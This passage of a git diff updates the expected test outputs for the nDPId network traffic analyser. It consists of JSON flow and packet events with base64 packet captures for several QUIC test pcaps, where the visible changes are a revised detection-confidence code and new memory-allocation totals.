\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAg\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICA="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} -00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633957625000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 476 chars ~~ json string max len.......: 3016 chars diff --git a/test/results/quic-mvfst-22.pcap.out b/test/results/quic-mvfst-22.pcap.out index 9d9899bd3..63cf6541a 100644 --- a/test/results/quic-mvfst-22.pcap.out +++ b/test/results/quic-mvfst-22.pcap.out @@ -1,10 +1,10 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":24710,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"thread_ts_msec":24710,"pkt":"UlQAEjUCCAAnANMtCABFAATsAABAAEARtN0KAAIPHw1WCIsRAbsE2LapyfrOsAEIVt4FS0mAWdwAAES+glHsK6O\/Oq7IqxunKa1n3XFv8eVEdrO\/buZ2LMAVEB2NyWCg6hfO6EP+vLVLmftkS1PJQqVl7L+7l7BI482Kpj4ofT9JnOQ0xEE4Vys3R4pwXiPc1lMJx32RX9zKYm+Z1fbMOyayi7zU0q+i63OayYrYD3jSt+Vvv7BMyIgMJ2yBRML4Cvl27dkQOy02PKy9hJb4U9IakyZ9jxJvJUG6tfB\/LJZUaX2z8xaFt+J6lEY3AOj1WgBxHOY78xSQcl0cfAaJSIKcA9Vn4sv\/fiPAKil0a5hIx6QXM2jiv4vFSqcgQHPhjbxlmksCUD71+BcElvTx09somsejpTEXOX5DumiTu+RmoxzAPxad\/yoHUmpVtJwSnjk0zwlToGO6SDPnEODnYt3LIvHRsx7mnFExLWnr+yQHfYFCeLNMctGGZBMubCx4gjt048OWguRvM18ud1xw3iRiS5rez8OMJIfcMnRlbnJA4MyOhWSWUbuYwKHXBZjNJSArgDpEssUAVBEOZQpnBVnXDGsqdTXz0eM1y7mnenMoiYqQeMnNMBDyturRKjEAiVgPEzOZ8CufggYEMfnAHCuOwF04gvqplTrrZWKOSNpdQNeFrRsWk7y1RbIKw3b8jWOTzA\/3wnocU7LCIqLpjBDheYw+YKL\/QStNjvcf462QDT2fMTEzd2qFUE5\/HIdvgFCjr11QAYfzSa9caF4orrxStMFBMwLrngiPEoNK2oL1ixSvqcDH1eCryay+ufbCfgtp9mN21cP9bS1fp+KOtJdRjk+WwIrnLE7yFL2kPl4Y1ub8Ic+0DgBOwxUrYa0lSq611ixLqvgBVVHqkVlsmy5FzYlt4nKwAzaE+UMlVSse0y5ciP9QYj7PgUOQsYRJLOdnUB1nb1cLIVzISsr9mEOc4Z\/V5yQfx0Je4KZnrBbnTxqzPJmczioPnEqWI3SSJQvibzfqftopphp69YYIvmngwQ9boqS8nu\/0Z90F4tXrXlEqVlkyt8z345OCJheKM35O3g1+gtDgXes9IlOq0VZHWc1xWYAyu3e5lYps9GawHgztTKd5Dh6phItAr7WJdjC7E5+Hw0Djk+jR2QPNAEyXNvBFWYdDCSKqCL0EW4k8u46MkhLkYoD\/U5LiEaiB5YSuGX8HZDJEwdOPPEWcT2hknjUDiQIy7tuEeBHkZxly3y9r8TtSEnAlDGbBVFAT+DI1sU7ifZHKOelnaNbzJX29JqcLfJH6OdFC035GL8QU1vvk19qbGftY3DBf6EJAhrCyEG8T68nr4mpyNVonkDSzrMh1qFjIZcwFXjgWWM6+wxfrI7EB5HOgW0H2RU+8jBV8bTAp0cYUEIW83AlhSIGJhaN4hzo4QbiQ\/NEKSL4V6HA7r2y3QQu7WQiGeuhWzieHC\/re+NOqmY8UZ2Nbtc52d9K25gQKE7BXNhq2zsjuIhLJme7BBI75RlEqF\/camjLVcquotPgLUp7uXIyomz0zmkrCGiGxy4HlklTCcE1ashYaXZA\/9HX39Pj6qB+WKglzfibh+ldNWXcB79RaHBC3E7rGwoRJM5jkaMEkWLJVppPuZZUXD0CLZZ5SItvsTmJ1D5A5i3llXNLFE2q4czLsPbe5Ft7r2t0="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05,h1q-fb","ja3":"a3795d067fbf6f44c8657f9e9cbae493","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05,h1q-fb","ja3":"a3795d067fbf6f44c8657f9e9cbae493","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} 02129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":24717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":24717,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAAYAAEAR9MMfDVYICgACDwG7ixEE7JMhzPrOsAEACEhjA85S+SrVAETSp3xd4I3jcnRue9L34hUuKLzlfpPUk0DMF1\/VFxThZTibHyGTQPaeM6iOotElwwAC1lRX5vIn9ya6YsAZzR1T20xEKAiW3eJkBYrfQ3apmceqTTBCX0bJxPnVeRIzBODDHWoJM4cXlDC\/p3lohjBDIh+3Pmk8tNap58UqGgjHnaigatc5CgFJHJWL+Kd1f9qcpuyZT1uB\/ns\/WT+PLudF\/jQ9707j1mFbnqiURY6nhTe97ZArhq7t1JVJAsO33k150ABBjgVdT\/6wgI8ik0OKmmJMbfb2L+7Ixq0YAACyySDSzQt+wcslS6ksj5zkeJG1dT9Y35jxFQSLUO32yxmbwQFG+b4QvZMRJyJvqfQ7oSMncZe7gs3wgTuaXe5geZfkx17MmRYXTYrf9pvAukh+MM4Q8hjt2gZyy+8MqEokO31Taq32iXjDeFgjn7q\/sQ6rvlxCVyZt8Ccaw1VxzzUAQNXg6QrtjGJsnqKEgZqyevLn4vgbCyEPYSqzUTMTMLMrTP+YLSeAUyD\/0KlFtPE0vwwFCXwILzsVlF8Hrkegr6zVR+h\/fNZFiUKr8jA4htexop3\/TtMjF2PSObMi\/B\/O4yOQK7dMjsb7j6HNoUatgqnfa\/Ep22MPaFjhmHCE5j8WrQYwGpwTuF1k+FX+IBnWV4aUFnYpvfr221AiaeRWseWythbDWPKdPOoQEd\/nzlYGC5Oxk\/91qMZSP6Qi8tEzsAHdyiB9WngqFXo1pqCT6\/T6hHvEqNor+wZ910MK6fQ\/Z\/7idL3\/nnBnU9m8lqNNZM0XegQQnU8+PD\/XZhQjxUwoqqNWAXTx+KKl5uQmMcpN8TieU3aBwrb2x1xcZVNXnjwFxiEsI7kDQg0bAdgGrjrWKUk4cVimEMb0EC3L3V2ZK9Ef+8sswkJ6ekYpwvMTIYU4ZOYeN6c9agkkoqzbCCHeRQql9R0YriJFUFgYENUK5b9nwRNBW+A+lZE8ptuzw5xsFcuyBXpjCKYIgsmKcLlQPkBkV4L5QGZQzzBmN2GgfUAEzN8WWVN0hJqYa9YhcX7zxmRv9gsMitNksaFnr6AlihFLFZqlT9Y648AprztjF7njBZZ3u+CXpZkG7Px2yrrdTouwjAToPn\/AdVmPPTHV6xKp99fDbwaMyfL+yOcnJ2plbK+wkS1jsiP\/yDk9VzA04xL0657ViUEAuv3t4Pev7pI\/DIFdRVSmTSWKvywkuBVJ\/VJOp\/6cO+Cy5FlDhTQR7H8evMXUaEHp69QHfF8fPUAjUyJ7IMeXXtuK3UkzI7UvsOqWVYGkA2OumbWmFRfgS9XBGi3DmR5otgit5Y81MAvHsCQ0V0IB2P\/yq9sRuL6R8TwF63sAvaPwfsPjICjHyZ2krnIlWXUbArKvncQeHm1H6y9ztqgfn+NTwpQWRfi71aj5FP2C+U3RB9l5HqGgyZJ9tt\/Xiom3MonkmdTNfE9C0G+zTKbgAzuir0+laGJim+TV37+wtcreN2P4GKPPo2goOCnc140xbDBLn4BL2axie9RcUyuxXK9wAWvijAfXal3f1DydwVZ8LxwK8o06yHcTKFQ\/sXJaHnxv2HTtF\/v0IBQjQRHILVxnhCjAh73MlFUFSG3zJQ2aU164W5cGJFQS3\/OOJsBbuI1J+KjSFQ=="} 02126{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":24717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":24717,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAAgAAEAR9MEfDVYICgACDwG7ixEE7GUmy\/rOsAEACEhjA85S+SrVAETSuH7quCgS8Qh0D\/bDO3gFDyLADGIuWnyCygbJxoXjp96KXvspho+865YDAISOGlOK6zOTsHDQAebkiFhwjAE3CGShccg0NcaDyS5u33R8Osm0onTcQUcavm+SMZHNxND0mAg59a7z7rYhXIsBKLYSznCIFNmBhvnQ+54HWzq4kDWVLL0ptfvb3giThFXk1AIMtBbaQwMGxHg\/8x0s7Ppw1zOCvbNuFb2SaGK8woqt2broJB\/xJJE2S1FwZCmQqqrE1mHTwDi+8M\/OC1IyVNxKVB8saqcFSbFe3BJEULgEgbvBwmfmNN7Wau\/J6gJxg5w745\/ujGtOLBoEAnkzp3XoTJN0Y42xyNe7RF+e2AS8staHpKBMbgG4b2fukqv0W5QWMOb9XdlK5lappO8kEpmoLvACo9Sy1bI0dfdz52edGlrvLjFy2h3zOMrwDHWDRiYmPSAbJ9pyo+VCqFMWVDhQI4ZmsKudQZcU+vReqpUp36fwM5gOtsh2Hk\/S0k+EHqDAZZLNzSF4Yr5ZabIDN\/R6biJU+FbtoUG+RJBpWcvmHAUftMbmErNWLgTpRpllj3nUl2F8eMASJGjRK8oYFrTV1fl7xjdeBam93XysGVWS92VND4SDvDULI6TRr\/337rNSj3EREqThlcSaMocH0kz+\/upNhJQxDeelV1RY26qv9bW8VdFma6p7uhfRK2roH3G5uc\/+tiG6qdmRct7WQoGsbTeaFFwB7Ji7Wtb9Amekof3OVUrPd+6iV+W3mM4hQL9kRTkFzHEd\/WA\/+8ZmZ+0XzQrpy3WwRvRc4DmvV7nvOYs8y+909LdGLV6CpRLEK1604OVZbyXxVxq8+mD19ElUn1g8QnbzGBFa3Eif7B0cGdFF8WqgYvqe7ufF46ZJs8QD63+SQv8gGxmUo3SJWQ3Yfj1uYEYSEfqi43AQxOFbKmd5oqszRdikvUk0Zh8XMjntw3CR4tWh1lqTR3LIN8Lt7A9gIRX8+3G76YoaDY2JIMjxOuLYIRBVe\/VWBuKPMLqRCv4wvIDach8GKJmbI9PTQ01q1Z5kL\/zM7jTdFAlentpckr6+ua\/D6t6rLd0nkkL8d+15pg8\/FKhrDBHA4Ml4BRHizjz4SpRJ2QEiV\/niWkbX1e0hkpcbZ2xmOFDZW\/9O8RjAOdM08kiCSbKZTUpnl9P0qLKtjystpZa5q8OrBMgSHUgHM1S7geU06smT7+czbBGnnd5A+6PV0mPwqueT\/OUV15fL2NUOxgfqhC8iKqRfJcjzm8CssrkrLVEfaPmw7D7KOm7\/2J64iyqOubriFO6KrbjP+1qKiLmCaqNeEy3JTylMKWsH5UVovtnGGCKeolJjanKSFdzQ0naGenN7GlArcfV78Zclt+QC9mK2mtHkEiOwhoeprg\/zQujUyWH4lxZTrhtEFhlJUvQKpPst4HYEqZgxQPGS5nmr51v1f2cwzcaORxf3cXeVVh\/GKwiwMjI8VaKzhRxAoKZZ3g1TUl61dqF4liU6GnZkX+YBlPJ80vXLVfIDc4zwsjaBUxk1pJO\/LOLCp5buKJ87EbzIoejsqFXfFarTVLwKw\/2KUHEIwDL1x1rU0t6Q+Ap29yyER+brp4OyVHhD6T7u9LrfjXexdQfUgnSNX1Ib4LZ7OO\/KrQ=="} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":24710,"flow_last_seen":139922,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267723,"flow_avg_l4_payload_len":546,"midstream":0,"thread_ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":24710,"flow_last_seen":139922,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267723,"flow_avg_l4_payload_len":546,"midstream":0,"thread_ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","packets-captured":490,"packets-processed":490,"total-skipped-flows":0,"total-l4-payload-len":267723,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":139922} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 490/490 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893774 bytes -~~ total memory freed........: 5893774 bytes -~~ total allocations/frees...: 118625/118625 +~~ total memory allocated....: 6027408 bytes +~~ total memory freed........: 6027408 bytes +~~ total allocations/frees...: 121387/121387 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2134 chars diff --git a/test/results/quic-mvfst-22_decryption_error.pcap.out b/test/results/quic-mvfst-22_decryption_error.pcap.out index c3ada5808..703f4674c 100644 --- a/test/results/quic-mvfst-22_decryption_error.pcap.out +++ b/test/results/quic-mvfst-22_decryption_error.pcap.out @@ -2,10 +2,10 @@ 00570{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593498296832} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 02105{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593498296832,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1260,"pkt_l4_len":1240,"thread_ts_msec":1593498296832,"pkt":"RTgE7B0GAABAEeVBCuYoqF5h4ZLy9AG7BNgTGcP6zrABCEACR1YBz3h7AABEvkgDSkdXT8KDRtZ6SuR9aklyes\/l4Sioa5nXAcPGveAb5Mb0k7uBERsrnzBa9uno+scwKQJ+8HaE7SwNRWaJ0B+VYq5sgzaHE9BksItfZB05b19PkWz3XaOJPeabOxbegkEde\/7BgQc2iMQiMZifq3YQkFbpelKpfZ8UxZbKFKO8T8enNpDFvm79StOLsc58r6VUI7R7RX2Dh+7UvHc8w55LVS4nFdKyvt+gLMAzuTrAqSRX04ucEX43SZLKcpJ+X+iK\/v9u1yLmGT\/8hHS\/A3VBUuWVRkAqUr3zRxflhV5CjsXky9idxKWm4C9Pn6cw4624LuYteYIUWOTHQHv3zV5\/rnXQxed5aHO337llijw0yLFxpnpOUEtoxTKtZZeNyR3\/hCIkY3n14k3gHfYXZl5t7DMoJYBnIHHhmdFCOK4sdCcKtpOlPKhDiv0BdCMImPxwr5CZ3d0NvKvNFKbylEYXGyw6diXHrADpP1Bpo7IsDo6OECekYHLzamw7fo5GRjTg4wyZ585sRHNOY5UQ14urjp6qTgyJaK+bJQKQXSG\/jPsJRoA3bT9RYwhd92VXr\/SRpMsMI1dgiAabVuN6aapjwqQ05GcX1xWXUOswELHBWeda+RZSG0ealfCxTmgk\/LmTIARNNTXtxke0sf\/IlfnV3ikcr9NqDIrI6of1G3cZfUQGBWE6gBVL5hH\/8pDG4T4ZpNiYz4Y0kEK9VRD1GZ0w6BCqlt\/kg2zd6ahgaI4n0T7BllqMO01YZ1t9pyXJShYy7a1\/GE3TCKsHNgIVU+OzGaBubO2O8foCsTRqluuqUPhG3n2E8MHmbHfrbqadkpRwbm5mHSUiRHvHPOMZ3uD3xF6j764aqPOQrl01dj1iQP+qGIcEY5l4ogPeALtV3hU5f7bpvLSDPKVoHsWvz++bxVzr7sgAnGREUzsxKt4SUYuRzz53icFmvd9rxNmgOaF+PEw\/dQIcNJqpxX8ulzLr4tUIjHsZy8Y3w0WHWlRvXX5BFt\/FNL6D1z9p+LMmNXuSPqVvh56LVqzeEf7uD4SQyYHHodFZUSZh4UJZfGLFC0ee